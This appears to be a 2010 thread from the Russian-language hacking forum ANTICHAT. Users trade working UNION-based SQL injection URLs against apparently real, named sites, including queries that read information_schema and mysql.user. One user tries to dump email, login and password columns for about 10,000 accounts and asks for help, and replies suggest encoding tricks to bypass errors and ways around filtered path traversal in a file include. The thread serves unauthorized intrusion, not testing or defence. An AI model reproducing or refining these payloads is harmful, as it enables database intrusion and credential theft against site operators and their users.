ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.11.2010, 16:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от budden
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
/thread98525.html
хотья не факт..
|
|
|
03.11.2010, 16:33
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от None
Вот так перебрал до 50, результат - ничего не найдено
Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\
Сообщение от None
Table 'krost.USER' doesn't exist
Таблица в другой бд
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_schema,4,5,database(),7,8,9+from+i nformation_schema.columns+where+table_name='USER'+ limit+1,100+--+
Запрос к этой таблице в бд mysql
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,3,4,5,6,7,8,9+from+mysql.user+--+
|
|
|
|
03.11.2010, 16:46
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от budden
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
https://rdot.org/forum/showpost.php?p=3323&postcount=16
|
|
|
|
03.11.2010, 16:56
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728
Репутация:
62
|
|
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i
|
|
|
|
03.11.2010, 17:56
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379
Репутация:
0
|
|
Сообщение от Чакэ
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел..
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
|
|
|
|
03.11.2010, 18:17
|
|
Новичок
Регистрация: 02.11.2010
Сообщений: 5
Провел на форуме:
1094
Репутация:
0
|
|
Всем спасибо, немного разобрался, пойду дальше пыхтеть)
|
|
|
|
03.11.2010, 21:21
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от brutos
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
извините ступил.. вроде sql не первый год юзаю а в скуль не додумался такое ставить.. черт.
|
|
|
|
03.11.2010, 22:25
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
|
|
|
|
03.11.2010, 22:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от ALIM
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
попробуй unhex(hex()) , aes_encrypt
|
|
|
|
03.11.2010, 22:51
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
Сообщение от ALIM
Помогите разобраться с запросом,
Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона
om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает.....
P.S. Или это только у меня ???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
